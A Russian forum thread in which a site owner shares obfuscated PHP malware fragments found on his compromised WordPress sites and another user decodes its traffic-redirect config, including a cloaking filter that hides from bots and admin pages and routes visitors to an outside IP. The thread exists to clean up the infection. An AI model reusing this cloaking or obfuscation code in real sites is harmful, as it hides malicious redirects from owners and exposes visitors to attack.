Вирус / вредоносный скрипт

Тема в разделе "Защита и взлом", создана пользователем yaponskky, 3 сен 2019.

Метки:
  1. yaponskky

    yaponskky Создатель

    Регистр.:
    23 авг 2018
    Сообщения:
    39
    Симпатии:
    3
    Всем привет. Ребят помогите расшифровать код. Есть пару сайтов на вордпрессе, и один статичный, на мобирайзе, и в один момент в корне сайтов и в подпапках начали появляться пхп файлы с рандомным названием и таким содержимым:

    PHP:
    <?php
    $quwsmyc 
    'Hoxt5vle89bs-_p4#r2\'i*7ndk3aum1yg0c';$quvzz = Array();$quvzz[] = $quwsmyc[0].$quwsmyc[21];$quvzz[] = $quwsmyc[16];$quvzz[] = $quwsmyc[26].$quwsmyc[34].$quwsmyc[15].$quwsmyc[26].$quwsmyc[7].$quwsmyc[27].
    ....
    как не пробовал раскодировать... не получается... плагины все обновил, движок, а файлы все равно появляются (

    Скачал архив сайта на локал, МС антивирь нашел еще такую дрянь:

    PHP:
    <?php
    $_067qdi 
    basename/*l*/(/*bug*/trim/*2zhe*/(/*n8o*/preg_replace/*y1*/(/*19q*/rawurldecode/*nkwb*/(/*n*/"%2F%5C%28.%2A%24%2F"/*hy*/)/*zt*/''__FILE__/*n7*/)/*s*//*t*/)/*9*//*hl8jb*/)/*8hgzu*/;$_053na "GVF%10%18S%00%02Z%40%0C%07G%09C%12J%5CV%08%3BPA%07%17%0AVD9%5BKR%04%10V%0ENJF%24Kl%5C%5CQ%0C%0AV%06N%10%1B%5CU%07UfT%0A%0AGK%11%170MB%03YMREC%1F%0EXJT%24%3AF%1CVB%0A%13V%0ETC%5B%1E%09U%03
    вижу команда rawurldecode... пробовал этот код в онлайн rawurldecode, но не раскодирует
     
    Последнее редактирование модератором: 3 сен 2019
  2. duxabilii

    duxabilii Создатель

    Регистр.:
    4 фев 2012
    Сообщения:
    17
    Симпатии:
    9
    Глянуть бы на полную версию сгенерированного файла и файла, на который антивирус ругается. Или же полный архив выложите, чтобы понять, где эта зараза спряталась
     
    yaponskky нравится это.
  3. yaponskky

    yaponskky Создатель

    Регистр.:
    23 авг 2018
    Сообщения:
    39
    Симпатии:
    3
    вот, нашел еще более сложный вирус, вероятно он и генерит рендомно эти файлы. Причем засада в том, что он может раскидывать файлы и модифицировать существующие начиная от корня папки хостинга...

    Я заархивировал, все таки вирусня
     

    Вложения:

    • .0f897ed3.zip
      Размер файла:
      23,4 КБ
      Просмотров:
      5
  4. hydropericardium

    hydropericardium Постоялец

    Регистр.:
    20 июн 2018
    Сообщения:
    74
    Симпатии:
    20
    Вирус может быть так же в теме\ядре\БД, вам надо найти его и удалять, а устранять последстия.
    Прогоните весь сайт серверным ai-bolit
     
    yaponskky нравится это.
  5. yaponskky

    yaponskky Создатель

    Регистр.:
    23 авг 2018
    Сообщения:
    39
    Симпатии:
    3
    да, я зарегал новый хостинг, на локал качаю сайт, чекаю айболитом, удаляю кучу дряни и заливаю на новый хостинг, там еще чекаю "Anti-malware" - очень годный плагин, и бд чекает тоже. Дальше пару недель выжидаю, если ничего нового не появится - следующий сайт. Просто хотел понять какой файл источник... но вероятно это дырявый плагин... хотя я уже все обновил
     
  6. duxabilii

    duxabilii Создатель

    Регистр.:
    4 фев 2012
    Сообщения:
    17
    Симпатии:
    9
    Расковырял исходный код. Дальше копать лень.
    Вот настройки расшифрованные (те, которые внизу файла в переменной $config)
    Код:
      
    array (
      'route' => '44ik04ku',
      'tds_port' => '80',
      'tds_filter' => 'if ($_SERVER[\'REQUEST_METHOD\'] != \'GET\' || empty($_SERVER[\'HTTP_ACCEPT_LANGUAGE\']) || strpos($_SERVER["HTTP_REFERER"], $_SERVER["HTTP_HOST"]) !== FALSE)
    {
        return FALSE;
    }
    if (empty($_SERVER[\'HTTP_USER_AGENT\']) || preg_match(\'/(yandexbot|baiduspider|archiver|track|crawler|google|msnbot|ysearch|search|bing|ask|indexer|majestic|scanner|spider|facebook|Bot)/i\', $_SERVER[\'HTTP_USER_AGENT\']))
    {
        return FALSE;
    }
    foreach (array(\'/\\.css/\', \'/\\.swf/\', \'/\\.ashx/\', \'/\\.docx/\', \'/\\.doc/\', \'/\\.xls/\', \'/\\.xlsx/\', \'/\\.xml/\', \'/\\.jpg/\', \'/\\.pdf/\', \'/\\.png/\', \'/\\.gif/\', \'/\\.ico/\', \'/\\.js/\', \'/\\.txt/\', \'/ajax/\', \'/cron\\.php/\', \'/wp\\-login\\.php/\', \'/\\/wp\\-includes\\//\', \'/\\/wp\\-admin/\', \'/\\/admin\\//\', \'/\\/wp\\-content\\//\', \'/\\/administrator\\//\', \'/phpmyadmin/i\', \'/xmlrpc\\.php/\', \'/\\/feed\\//\', ) as $regex)
    {
        if (preg_match($regex, @$_SERVER[\'REQUEST_URI\']))
        {
            return FALSE;
        }
    }
    return TRUE;',
      'tds_path' => '/readme.php',
      'tds_ip' => '138.201.1.11',
    )
    
     

    Вложения:

    • decode.zip
      Размер файла:
      3,8 КБ
      Просмотров:
      0
    yaponskky нравится это.
  7. yaponskky

    yaponskky Создатель

    Регистр.:
    23 авг 2018
    Сообщения:
    39
    Симпатии:
    3
    круто, спасибо огромное, не полностью конечно ясно что код делает.
    А вот айпи 138.201.1.11 думаю заблокировать не лишним будет
     
  8. duxabilii

    duxabilii Создатель

    Регистр.:
    4 фев 2012
    Сообщения:
    17
    Симпатии:
    9
    Там в коде еще ИП 77.87.193.14 светится. И его лучше прикрыть. ИМХО